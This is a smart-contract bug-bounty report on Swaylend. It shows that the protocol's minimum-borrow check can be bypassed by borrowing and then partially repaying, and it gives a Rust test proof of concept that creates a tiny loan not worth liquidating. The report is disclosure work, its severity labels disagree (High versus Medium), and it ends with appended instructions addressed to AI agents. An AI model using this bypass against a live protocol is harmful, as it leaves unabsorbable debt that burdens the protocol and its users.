# #35831 \[SC-High] By bypassing base\_borrow\_min limitation borrows can create inabsorbable loans **Submitted on Oct 10th 2024 at 08:54:13 UTC by @SeveritySquad for** [**IOP | Swaylend**](https://immunefi.com/audit-competition/iop-swaylend) * **Report ID:** #35831 * **Report Type:** Smart Contract * **Report severity:** High * **Target:** * **Impacts:** * Griefing (e.g. no profit motive for an attacker, but damage to the users or the protocol) * Contract fails to deliver promised returns, but doesn't lose value ## Description ## Brief/Intro The \`withdraw\_base()\` contains a condition to prevent creation of loans smaller than \`base\_borrow\_min\` amount. This limitation can be bypassed, by creating a larger loan (higher than \`base\_borrow\_min\` amount) and repaying some portion of it so that the remaining part is lower than \`base\_borrow\_min\`. ## Vulnerability Details The \`withdraw\_base()\` method contains the following condition: \`\`\` require( u256::try\_from(user\_balance.wrapping\_neg()) .unwrap() >= storage .market\_configuration .read() .base\_borrow\_min, Error::BorrowTooSmall, ); \`\`\` While it prevents a borrow for taking a too small loan, this check is not present in the \`supply\_base()\`. As a result a user can take a larger loan and then repay immediately back some smaller portion so that the balance will eventually be lower than \`base\_borrow\_min\`. ## Impact Details The impact of this issue is that if those position are small enough they may not be worth to cover the gas cost of calling the \`absorb()\` for those accounts. Hence the collateral will be stuck in the contract as there would be no financial incentive to take out such a small amount. While those amounts are small they can amass over time on multiple accounts, hence the chosen severity is Medium as it falls into griefing category. ## References condition in the \`withdraw\_base()\`: ## Proof of Concept ## Proof of Concept The PoC presents creation of a debt position of size \`1\`: \`\`\` #\[tokio::test] async fn poc\_create\_small\_loan() { let TestData { wallets, alice, alice\_account, bob, bob\_account, chad, market, assets, usdc, eth, oracle, price\_feed\_ids, publish\_time, prices, usdc\_contract, .. } = setup().await; ``` let price_data_update = PriceDataUpdate { update_fee: 0, price_feed_ids, publish_times: vec![publish_time; assets.len()], update_data: oracle.create_update_data(&prices).await.unwrap(), }; // ================================================= // ==================== Step #0 ==================== // 👛 Wallet: Alice 🧛 // 🤙 Call: supply_base // 💰 Amount: 3000.00 USDC let alice_supply_amount = parse_units(3000 * AMOUNT_COEFFICIENT, usdc.decimals); let alice_mint_amount = parse_units(4000 * AMOUNT_COEFFICIENT, usdc.decimals); let alice_supply_log_amount = format!("{} USDC", alice_supply_amount as f64 / SCALE_6); print_case_title(0, "Alice", "supply_base", alice_supply_log_amount.as_str()); println!("💸 Alice + {alice_supply_log_amount}"); usdc_contract .mint(alice_account, alice_mint_amount) .await .unwrap(); let balance = alice.get_asset_balance(&usdc.asset_id).await.unwrap(); assert!(balance == alice_mint_amount); let alice_supply_res = market .with_account(&alice) .await .unwrap() .supply_base(usdc.asset_id, alice_supply_amount) .await; assert!(alice_supply_res.is_ok()); market.debug_increment_timestamp().await.unwrap(); // ================================================= // ==================== Step #1 ==================== // 👛 Wallet: Bob 🧛 // 🤙 Call: supply_collateral // 💰 Amount: 1.00 ETH let bob_supply_amount = parse_units(1 * AMOUNT_COEFFICIENT, eth.decimals); let bob_supply_res = market .with_account(&bob) .await .unwrap() .supply_collateral(eth.asset_id, bob_supply_amount) .await; assert!(bob_supply_res.is_ok()); let bob_user_collateral = market .get_user_collateral(bob_account, eth.asset_id) .await .unwrap() .value; assert!(bob_user_collateral == bob_supply_amount); market .print_debug_state(&wallets, &usdc, &eth) .await .unwrap(); market.debug_increment_timestamp().await.unwrap(); // ================================================= // ==================== Step #2 ==================== // 👛 Wallet: Bob 🧛 // 🤙 Call: withdraw_base // 💰 Amount: <MAX HE CAN BORROW> let max_borrow_amount = market .available_to_borrow(&[&oracle.instance], bob_account) .await .unwrap(); let log_amount = format!("{} USDC", max_borrow_amount as f64 / SCALE_6); print_case_title(2, "Bob", "withdraw_base", &log_amount.as_str()); let bob_borrow_res = market .with_account(&bob) .await .unwrap() .withdraw_base( &[&oracle.instance], max_borrow_amount.try_into().unwrap(), &price_data_update, ) .await; assert!(bob_borrow_res.is_ok()); let balance = bob.get_asset_balance(&usdc.asset_id).await.unwrap(); assert!(balance == max_borrow_amount as u64); market .print_debug_state(&wallets, &usdc, &eth) .await .unwrap(); // ================================================= // ==================== Step #3 ==================== // 👛 Wallet: Bob 🧛 // 🤙 Call: withdraw_base // 💰 Amount: <max he can borrow - 1> //let tx_policies = TxPolicies::default().with_script_gas_limit(1_000_000); // Withdraw base // Supply base let supply_base_call = market .with_account(&bob) .await .unwrap() .supply_base(usdc.asset_id, max_borrow_amount as u64 - 1) .await; // Check borrow amount of bob let (_, borrow) = market.get_user_supply_borrow(bob_account).await.unwrap(); println!("Bob's borrow amount: {} ", borrow); ``` } \`\`\` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://reports.immunefi.com/swaylend_iop/35831-sc-high-by-bypassing-base_borrow_min-limitation-borrows-can-create-inabsorbable-loans.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.